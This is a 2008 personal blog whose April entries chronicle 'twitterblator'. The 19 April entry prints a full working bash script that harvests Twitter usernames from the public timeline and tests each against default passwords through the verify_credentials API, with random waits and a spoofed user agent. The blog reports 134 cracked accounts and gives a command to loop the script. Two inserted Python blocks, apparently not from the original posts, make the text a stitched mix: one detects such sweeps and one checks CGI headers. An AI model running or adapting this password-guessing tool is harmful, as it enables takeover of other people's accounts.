f-log

just another web log

29 Apr 2008 22:47
*grumble* *grumble* silverlight f*%$^ ...
While not hating silverlight I am trying to complete Mario Galaxy on the Wii, now up to 116 stars out of 120 but ...
Sarah ordered Mario Kart for the Wii for my birthday, it did not turn up. We rang after a week and were told we had to wait at least seven working days. Still did not show up so rang and got our money back. At the weekend I spent some time in the garden with Alex; it just so happened that by pure fluke I followed the football we were playing with down the side alley and there was a cardboard box under some empty bags.
So we paid (again) and I have Mario Kart for the Wii with the steering wheel. Only got to try it for a short while but seems a lot of fun and the online stuff had zero lag.
26 Apr 2008 22:24
When I am not busy hating silverlight I have been reading "Wild Fire" by Nelson DeMille.
My Dad lent me this so I had not read the jacket before starting, this gave me a much more enjoyable experience, but as most people read the jackets before choosing a book I wonder what everyone else's experience was like.
First off I liked this book, it was funny, gritty and downright entertaining, and sometimes that's all you want so I am pleased to say this book offered that little bit more.
Everything (that could be) seemed rooted in reality and the list of acknowledgments attests to how thorough the author is, which took away from the problems in a Dan Brown book [1] [2] [3].
Perfect page turner, not too deep but enough to keep you interested and nothing so far out there it breaks the spell.
24 Apr 2008 21:36
Here is the promised source
Page.xaml
Page.xaml.cs
Images and sound are in the ClientBin/slOverclick.xap file which is a zip file, just rename it.
Today's reasons to hate silverlight: it does not handle GIF files and crossdomain.xml is flaky.
23 Apr 2008 21:33
I still hate silverlight but at least I managed to produce a small game with it.
http://www.pay4foss.org/jumpstation/idoudo
Obviously it requires the silverlight plugin so for those of you with that or a working moonlight, it is a simple Simon-type game with blocks (rendered in Blender) that light up in a sequence that you must repeat, getting longer and longer.
There is also sound created from scratch in audacity and an ear created in inkscape.
Before you can start you must click the button marked "click to begin", this caused me no end of problems as one of the (many) known bugs with silverlight is you can not change the visibility of a button in its own onclick event.
Then there is the "you can not play the same sound more than once" bug and many MANY others.
So although this is a simple game it was a struggle to get it to do the simplest things.
I will not mention mime types or URI references ...
Source tomorrow, when I have tidied it a bit.
21 Apr 2008 21:25
And the final twitterblator results are ...
134 hits (validated passwords) out of 49226 unique attempts.
That's 1 in 367, which is pretty good really.
Remember as with any statistics this 1 in 367 is during the duration and date of my experiment, tomorrow no accounts used may be susceptible and the day after all the accounts used may be bad.
As for future twitter experiments I have actually gone off the idea due to the time it would take and instead I am now playing with silverlight.
Silverlight hates me and I hate silverlight (at the moment).
20 Apr 2008 22:44
twitterblator conclusions:
*Is running this evil? No, I do not record badly secured accounts nor do *ANYTHING* with them.
*Is releasing the code evil? Hmmm, in theory any code can be subverted, I see nothing that is difficult or clever or even "script kiddie" friendly in the twitterblator code.
*Can twitter stop twitterblator? Yes, but it would be very hard for them. Either they profile usage, i.e. check the repeated checks of accounts from a single IP address, or lock down the API and access to twitter; this would kill hundreds of existing applications and web sites.
*Can twitterblator be used or modified for use with other micro blog sites? Yes, but it may take a lot of work due to *most* sites locking down the sort of access twitterblator makes use of. Twitter has a verify account API option, I never *tried* to log these accounts in.
*What was the final ratio of secure to insecure accounts? answer tomorrow...
I was going to release the results under a "unnamed social site" but as so few users are affected I am happy to shout TWITTER all over the place.
Also, remember that if a user did not twit or was set to a private account during the test then they were not included.
Now for my next twitter project (as the source is so rich) ... ;)
19 Apr 2008 21:32
OK the twitterblator code, short and sweet:
#!/bin/bash
# twitterblator tb.sh
# 16/04/2007 -
# tests twitter accounts for 'default' passwords
# see README for more information

USERAGENT=`cat agentstring.dat`
TEMPFILEUSERS="temp.users"
TEMPFILEUSERSDD="temp.usersdd"
TEMPFILEACCESS="temp.access"
DATABASE="db.users"
VERIFYURL="http://twitter.com/account/verify_credentials.xml"
SOURCEURL="http://twitter.com/statuses/public_timeline.rss"
HITDB="db.hit"
TEMPFILEHITS="temp.hit"

wget --quiet --wait=4 --random-wait -O - -U "$USERAGENT" $SOURCEURL | grep "^\W*<guid>" | sed -e 's/.*com\/\([^\/]*\).*/\1/gi' > $TEMPFILEUSERS

# do deduping here
rm -f $TEMPFILEUSERSDD
touch $TEMPFILEUSERSDD
echo "Deduping"
echo "|--------------------|" # most likey 20 lines
echo -n " "
while read line; do
    echo -n ":"
    grep -w -q $line $DATABASE || echo $line >> $TEMPFILEUSERSDD
done < $TEMPFILEUSERS
if [ -e $TEMPFILEUSERSDD ]; then
    cat $TEMPFILEUSERSDD >> $DATABASE
fi
echo ""

# setup usernames and passwords
awk '{ if (length>5) printf("--user=%s --password=%s\n",$0,$0); else printf("--user=%s --password=password\n",$0); }' $TEMPFILEUSERSDD > $TEMPFILEACCESS

# check accounts
rm -f $TEMPFILEHITS
echo "checking accounts"
echo "|--------------------|" # most likey up to 20
echo -n " "
touch $TEMPFILEHITS
while read line; do
    echo -n ":"
    wget --quiet --wait=4 --random-wait --delete-after -U "$USERAGENT" $line $VERIFYURL && echo 1 >> $TEMPFILEHITS
done < $TEMPFILEACCESS
echo ""

# report results
echo -n "found "
if [ -e $TEMPFILEHITS ]; then
    echo -n `wc -l $TEMPFILEHITS | cut -d " " -f 1`
else
    echo -n "0"
fi
echo " hits in last attempt"
cat $TEMPFILEHITS >> $HITDB

echo -n "that is a total of "
if [ -e $HITDB ]; then
    echo -n `wc -l $HITDB | cut -d " " -f 1`
else
    echo -n "0"
fi
echo -n " hits for "
echo -n `wc -l $DATABASE | cut -d " " -f 1`
echo " users"

# tidy up temp files
rm -f $TEMPFILEUSERS
rm -f $TEMPFILEUSERSDD
rm -f $TEMPFILEACCESS
rm -f $TEMPFILEHITS

As always I could have done it very differently, fewer temp files, different language etc. but this was a quick hack and I was pleasantly surprised how quickly I got the AWK and the deduping working :)
18 Apr 2008 17:37
Twitterblator update. It's been running for over 16 hours and
Deduping
|--------------------|
::::::::::::::::::::
checking accounts
|--------------------|
::::::::::
found 0 hits in last attempt
that is a total of 47 hits for 11939 users

It's worth noting at this point that twitterblator is not in violation of the Terms of Service as once an account has been verified nothing is done, i.e. the user is not logged on. Nor is any information pertaining to which user was verified or what type of default password was used recorded.
while true; do sleep 65; sh tb.sh; done
I have got to say for a service that lets you use its system *WITHOUT* verifying your email address I expected a much higher hit count. But one thing I did notice is lots of twitterers have non-English user names and posts so maybe I should try the localised version of "password" :)
The "Deduping" section above makes sure the regular posters are not repeatedly targeted and the number of ":" under "checking accounts" is the number of new unique usernames to try out of the twenty received each time.
So at the end of this I am going to have a text file with thousands of usernames ...
Oh, publishing the code, erm maybe tomorrow ...
17 Apr 2008 22:54
Steve alerted me to twitter, a microblog site that can be easily updated.
I decided to have a look after I saw answerme and noticed it was accessing *everyone's* twitters, though that turned out to be just public twitters.
Time to have a look at twitter. First off there is a public "latest posts" page with an rss option, not only easy to scrape but application developers are encouraged to do so.
It's worth noting at this point that the *many* twitter alternatives lock this functionality down by requiring access via a registered APPID (application identifier supplied by the site owners).
Next, instead of having to connect via a POST HTML form twitter allows anyone to *try* a username and password combination and returns success or failure.
So it took me almost no time to write a bash script that:
Retrieved the latest public twitterings.
Parsed out all the user names.
Tried each user name along with a default password.
Logged if the combination was a success.
Reported how many hits had been found against the total attempted.
Default password is either the user name or "password" as twitter passwords have to be 6 characters or more.
Currently:
Deduping
|--------------------|
::::::::::::::::::::
checking accounts
|--------------------|
::::::::::::::::
found 0 hits in last attempt
that is a total of 3 hits for 800 users

Now to leave it over night ...
And the name for this naughtiness? The twitterblator.
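The profiling defence mentioned in the conclusions entry (checking repeated account checks from a single IP address) applied to the pattern described here, as an added example that is not part of the post or of twitter's own systems: it parses constructed access-log lines (the log format, IPs and usernames are assumptions) and flags any IP that checks credentials for many distinct accounts in a short window, which is what one default-password sweep of a scraped public timeline looks like.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (not real twitter.com logs): client IP,
# HTTP-auth username, timestamp, request line, status. 203.0.113.7 shows the
# twitterblator pattern: one credential check per scraped username, seconds apart.
SAMPLE_LOG = """\
203.0.113.7 alice [18/Apr/2008:09:00:01 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 401
203.0.113.7 bob [18/Apr/2008:09:00:06 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 401
203.0.113.7 carol [18/Apr/2008:09:00:12 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 401
203.0.113.7 dave [18/Apr/2008:09:00:17 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 200
203.0.113.7 erin [18/Apr/2008:09:00:23 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 401
198.51.100.9 alice [18/Apr/2008:09:00:30 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 401
198.51.100.9 alice [18/Apr/2008:09:00:40 +0000] "GET /account/verify_credentials.xml HTTP/1.0" 200
198.51.100.9 alice [18/Apr/2008:10:30:00 +0000] "GET /statuses/public_timeline.rss HTTP/1.0" 200
"""

LINE_RE = re.compile(r'^(\S+) (\S+) \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})$')
VERIFY_PATH = "/account/verify_credentials.xml"


def parse_line(line):
    """Return (ip, user, timestamp, path, status) or None for an unparseable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, user, ts, path, status = m.groups()
    return ip, user, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)


def flag_credential_sweeps(log_text, window=timedelta(minutes=10), min_users=4):
    """Map IP -> sorted usernames for IPs that checked credentials of at least
    min_users distinct accounts inside any sliding window. Successes count too:
    a correct default password is still a probe, not a normal client login."""
    events = defaultdict(list)  # ip -> [(timestamp, user)]
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec[3] == VERIFY_PATH:
            events[rec[0]].append((rec[2], rec[1]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # slide the window forward past old checks
            if len({u for _, u in evs[start:end + 1]}) >= min_users:
                flagged[ip] = sorted({u for _, u in evs})
                break
    return flagged
```

A single user retrying their own password (198.51.100.9 above) is not flagged; a shared NAT or proxy can legitimately produce many distinct users from one address, so tune min_users and the window against your own traffic and combine with the 401 ratio before blocking.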
14 Apr 2008 21:49
The last book review was almost 9 months ago, I am sure I have read something since then ...
I got a signed copy of A Cat Called Birmingham (paperback), the author lives near my mum. Looked a bit odd, subtitled "A biography of nine lives" but was actually really good.
Read a bit like a number of blog posts recounting events in the cat and owner's lives, very easy to read, guaranteed to make you laugh out loud or at least chuckle. Which itself is odd due to most of these "events" relating to cat-tastrophes of a painful nature.
Since then I have also read "Patricia Cornwell's Book of the Dead" which was a gift from my Aunt.
This book has the grip of a Dan Brown book but without the constant feeling you do not want to be reading it. Very well done, three dimensional characters and a twisting, interweaving story line that at one point I was worried was going to come out all 'Hollywood' and spoil everything but left me with a contented feeling that I had read a good book!
12 Apr 2008 20:01
Boa cgi and 502 Bad Gateway
The CGI was not CGI/1.1 compliant.

even with the simplest Perl script, turns out that all CGI scripts *MUST* output the mime type of the content e.g.
#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "zombie";

just to get the single word output "zombie"
Surprisingly this information does not appear anywhere for the 502 error but if you read numerous CGI "getting-started" tutorials the requirement is made. Some web servers have a directive to disable the requirement.
Boa is currently running on my NSLU2
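The header requirement above, as an added checker that is not part of the post or of Boa: it splits CGI script output the way a CGI/1.1 server does, reports the header-less case that Boa answers with 502, and wraps a body in the minimal compliant response the post arrived at (Python; the sample outputs are constructed, not captured from Boa).

```python
# Constructed CGI outputs: the "zombie" script from the post, with and without
# the header block. Bytes are embedded here, not captured from a running server.
GOOD_OUTPUT = b"Content-type: text/html\n\nzombie"
BAD_OUTPUT = b"zombie\n"  # what the header-less script produces


def parse_cgi_output(raw):
    """Split script output into (headers, body) per CGI/1.1: header lines,
    one empty line, then the body. Returns None when no header block exists."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        idx = raw.find(sep)
        if idx != -1:
            break
    else:
        return None  # no blank line at all, so no header/body boundary
    head, body = raw[:idx], raw[idx + len(sep):]
    headers = {}
    for line in head.splitlines():
        name, colon, value = line.partition(b":")
        if not colon:
            return None  # a line that is not "Name: value" means no header block
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body


def is_cgi_compliant(raw):
    """True if the output carries at least one CGI/1.1 response header
    (Content-Type, Location or Status); otherwise a server like Boa answers 502."""
    parsed = parse_cgi_output(raw)
    if parsed is None:
        return False
    headers, _ = parsed
    return any(h in headers for h in ("content-type", "location", "status"))


def cgi_document(body, content_type="text/html"):
    """Wrap a body in the minimal compliant document response."""
    return b"Content-type: " + content_type.encode() + b"\r\n\r\n" + body
```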
07 Apr 2008 21:29
WOW! I need to buy shares in the company making anything called a USB Finger Mouse
The future is here
Disclaimer:
This page is by me for me, if you are not me then please be aware of the following
I am not responsible for anything that works or does not work including files and pages made available at www.jumpstation.co.uk. I am also not responsible for any information (or what you or others do with it) available at www.jumpstation.co.uk
In fact I'm not responsible for anything ever, so there!
